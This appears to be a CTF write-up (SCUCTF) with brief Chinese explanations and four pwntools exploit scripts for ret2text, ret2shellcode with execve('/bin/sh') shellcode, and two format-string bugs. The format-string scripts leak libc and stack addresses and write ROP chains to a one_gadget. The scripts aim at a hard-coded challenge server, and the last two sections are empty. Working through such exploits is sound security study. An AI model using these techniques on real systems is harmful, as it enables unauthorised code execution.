SCUCTF WP

1. ret2text

程序给出后门函数,且存在栈溢出,直接修改返回地址控制程序执行流即可

# Exploit script for challenge 1 (ret2text).  Per the write-up text above, the
# binary ships a backdoor function and has a stack overflow, so the script only
# needs to overwrite the saved return address.  The hard-coded absolute address
# implies a non-PIE binary without a stack canary (not stated; inferred).
from pwn import *
# 32-bit target.  log_level='debug' makes pwntools print every byte exchanged.
context(os='linux', arch='i386', log_level='debug', terminal=['tmux', 'splitw', '-hp', '70'])
#p = process('./ret2text')
p = remote('114.117.187.56', 10002)   # CTF instance used by the author


# 0x24 bytes of filler, 4 bytes for the slot just below the return address
# (presumably the saved ebp), then 0x08049256 as the new return address
# (the backdoor function according to the write-up).
payload: bytes = b'A'*0x24 + p32(0) + p32(0x08049256)
p.recvuntil('get it !\n')   # wait for the prompt before sending
p.send(payload)

p.interactive()

2. ret2shellcode

栈溢出,bss可执行且地址可控,编写shellcode即可

# Exploit script for challenge 2 (ret2shellcode).  Per the write-up, the program
# copies the first input into a bss buffer that is both writable and executable,
# and a stack overflow in the second input lets the return address point there.
from pwn import *
context(os='linux', arch='amd64', log_level='debug', terminal=['tmux', 'splitw', '-hp', '70'])
#p = process('./ret2shellcode')
p = remote('114.117.187.56', 10003)


# Assembled by pwntools for the amd64 context above.  The body is a string
# literal, so its uneven indentation is kept verbatim and is harmless.
# rax=0x3b is the x86-64 execve syscall number; rdi points at the string
# pushed on the stack, rsi/rdx are NULL argv/envp.
shellcode: bytes = asm('''
        mov rdx, 0
mov rsi, 0
mov rdi, 0x68732f6e69622f
push rdi
mov rdi, rsp
mov rax, 0x3b
syscall
        ''')

# First prompt: the program stores the shellcode (at 0x4040a0, judging by the
# return address used below).
p.sendafter('shellcode?\n', shellcode)
#gdb.attach(p)
# Second prompt: 0x20 bytes of filler, 8 bytes for the slot below the return
# address (presumably saved rbp), then the bss address of the shellcode.
p.sendafter('ret2shellcode\n', b'A'*0x20 + p64(0) + p64(0x4040a0))

p.interactive()

3. fmt

格式化字符串漏洞,先利用%p泄露地址,然后再利用%hn/%n构造ROP链,先pop再one_gadget

# Exploit script for challenge 3 (fmt).  The program re-reads input in a loop
# and passes it to printf.  As the write-up says, %p leaks addresses and
# %n / %hn then write a short ROP chain (pop gadget, then one_gadget) onto the
# stack.  Every offset below is specific to this binary and the challenge's
# libc.so.6; none of them is derived at runtime.
#
# Write primitive used throughout: "%<count>c" pads the output to <count>
# characters and "%8$n" / "%8$hn" stores that count (4 / 2 bytes) through the
# pointer placed at offset 16 of the input, which printf reads as argument 8.
from pwn import *
context(os='linux', arch='amd64', log_level='debug', terminal=['tmux', 'splitw', '-hp', '70'])
#p = process('./fmt', env = {"LD_PRELOAD" : "./libc.so.6"})
libc = ELF('./libc.so.6')   # NOTE: rebound to an int a few lines down; the ELF object is never used
p = remote('114.117.187.56', 10004)

# Leak: printf argument 41 holds a libc pointer; 14 chars = "0x" + 12 hex digits.
p.sendafter('your input: \n', b'%41$p')

# 0x24083 is the leaked pointer's offset inside the challenge libc (from the write-up).
libc = int(p.recv(14), 16) - 0x24083
info("libc ===> " + hex(libc))


# Leak: printf argument 32 holds a stack pointer; stack+0x22 is the write base.
p.sendafter('your input: \n', b'%32$p')
stack: int = int(p.recv(14), 16)
info("stack ===> " + hex(stack))



# Candidate one_gadget offsets for the challenge libc; only [0] is used.
one_gadget: list[int] = [0xe3afe, 0xe3b01, 0xe3b04]


pop_addr: int = 0x4013ec   # gadget in the (non-PIE) binary, named pop_addr by the author
# Slot at stack+0x22 (presumably the return address): low dword = pop_addr.
payload  = b'%' + str(pop_addr).encode() + b'c' + b'%8$n'
payload  = payload.ljust(16, b'\x00') + p64(stack+0x22)
p.sendafter('your input: \n', payload)

# No padding, so the stored count is 0: clears the high dword of that slot.
payload  = b'%8$n'
payload  = payload.ljust(16, b'\x00') + p64(stack+0x22 + 4)
p.sendafter('your input: \n', payload)


# Zero the eight dwords at +8 .. +0x27 (the values the pop gadget consumes
# before its ret, presumably; the write-up does not say why they must be 0).
for i in range(8):
    payload  = b'%8$n'
    payload  = payload.ljust(16, b'\x00') + p64(stack+0x22 + 8+4*i)
    p.sendafter('your input: \n', payload)



# Store libc+one_gadget[0] at +40 as 2-byte %hn writes, 16 bits at a time.
aa: int = (libc + one_gadget[0]) & 0xffff
payload  = b'%' + str(aa).encode() + b'c' + b'%8$hn'
payload  = payload.ljust(16, b'\x00') + p64(stack+0x22+40)
p.sendafter('your input: \n', payload)


aa = ((libc + one_gadget[0]) >> 16) & 0xffff
payload  = b'%' + str(aa).encode() + b'c' + b'%8$hn'
payload  = payload.ljust(16, b'\x00') + p64(stack+0x22+40+2)
p.sendafter('your input: \n', payload)


aa = ((libc + one_gadget[0]) >> 32) & 0xffff
payload  = b'%' + str(aa).encode() + b'c' + b'%8$hn'
payload  = payload.ljust(16, b'\x00') + p64(stack+0x22+40+4)
p.sendafter('your input: \n', payload)


# Bits 48-63 of a user-space address are zero.  The author disabled this last
# store, so the two bytes at +46 keep whatever the stack held (the zeroing loop
# above stops at +0x27) — presumably already zero on the target.
aa = ((libc + one_gadget[0]) >> 48) & 0xffff
payload  = b'%' + str(aa).encode() + b'c' + b'%8$hn'
payload  = payload.ljust(16, b'\x00') + p64(stack+0x22+40+6)
#p.sendafter('your input: \n', payload)

info("one_gadget ===> " + hex(libc + one_gadget[0]))
#gdb.attach(p)
#gdb.attach(p)
# 'exit' presumably ends the input loop so the function returns into the chain.
p.sendafter('your input: \n', b'exit')


p.interactive()

4. fmt2

这题跟上题的区别是数据不是直接写到栈上,但是可以利用栈中已有数据构成的链修改函数返回地址

# Exploit script for challenge 4 (fmt2).  Same format-string bug as challenge 3,
# but the input buffer is not on the stack, so (as the write-up says) the writes
# go through a pointer chain that already exists on the stack.
#
# Pattern used throughout: "%<v>c%24$hn" sets the low 16 bits of the stack slot
# that argument 24 points at; that slot is what printf reads as argument 37, so
# the following "%<v>c%37$n" / "%37$hn" stores <v> at the address just chosen.
# A bare "%37$n" stores 0 (nothing was printed).  All offsets are specific to
# this binary and the challenge libc.
from pwn import *
context(os='linux', arch='amd64', terminal=['tmux', 'splitw', '-hp', '70'])
#context.log_level = 'debug'
#p = process('./fmt-bss', env = {"LD_PRELOAD":"./libc.so.6"})
p = remote('114.117.187.56', 10005)

# Leak a libc pointer (argument 7); 0x24083 is its offset inside the challenge libc.
payload: bytes = b'%7$p'
p.sendafter("your input: \n", payload)
libc: int = int(p.recv(14), 16) - 0x24083
info("libc ==> " + hex(libc))

# Leak a stack pointer (argument 9); the chain is written starting at stack-0xf0.
payload = b'%9$p'
p.sendafter("your input: \n", payload)
stack: int = int(p.recv(14), 16)
info("stack ==> " + hex(stack))

pop_ret: int = 0x40139c   # gadget in the (non-PIE) binary, named pop_ret by the author


# Aim argument 37 at stack-0xf0 (presumably the return-address slot).
aa: int = (stack - 0xf0) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
p.sendafter("your input: \n", payload)


# Low dword of that slot = pop_ret (4-byte %n).
aa = (pop_ret) & 0xffffffff
payload = b'%' + str(aa).encode() + b'c' + b'%37$n'
p.sendafter("your input: \n", payload)

# High dword of that slot = 0.
aa = (stack - 0xf0 + 4) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
p.sendafter("your input: \n", payload)

payload = b'%37$n'
p.sendafter("your input: \n", payload)

# Next, zero the following 16 dwords (+8 .. +0x47), two sends per dword.
for i in range(16):
    aa = (stack - 0xf0 + 4*i + 8) & 0xffff
    payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
    p.sendafter("your input: \n", payload)

    payload = b'%37$n'
    p.sendafter("your input: \n", payload)

one_gadget: list[int] = [0xe3afe]   # one_gadget offset for the challenge libc

# Store libc+one_gadget[0] at +0x28 as three 2-byte %hn writes.  Bits 48-63
# are zero and +0x2e lies inside the range zeroed above, so no fourth write.
aa = (stack - 0xf0 + 0x28) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
p.sendafter("your input: \n", payload)

aa = (libc + one_gadget[0]) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%37$hn'
#gdb.attach(p)
p.sendafter("your input: \n", payload)


aa = (stack - 0xf0 + 0x28 + 2) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
p.sendafter("your input: \n", payload)

aa = ((libc + one_gadget[0])>>16) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%37$hn'
p.sendafter("your input: \n", payload)



# Write the last four bytes (author's wording; the store below is a 2-byte %hn at +0x2c)
aa = (stack - 0xf0 + 0x28 + 4) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
p.sendafter("your input: \n", payload)

aa = ((libc + one_gadget[0])>>32) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%37$hn'
#gdb.attach(p)
p.sendafter("your input: \n", payload)


# 'exit' presumably ends the input loop so the function returns into the chain.
p.sendafter("your input: \n", b'exit\n')


p.interactive()

5. easy_shellcode

6.

原文地址:http://www.cnblogs.com/countfatcode/p/16913858.html
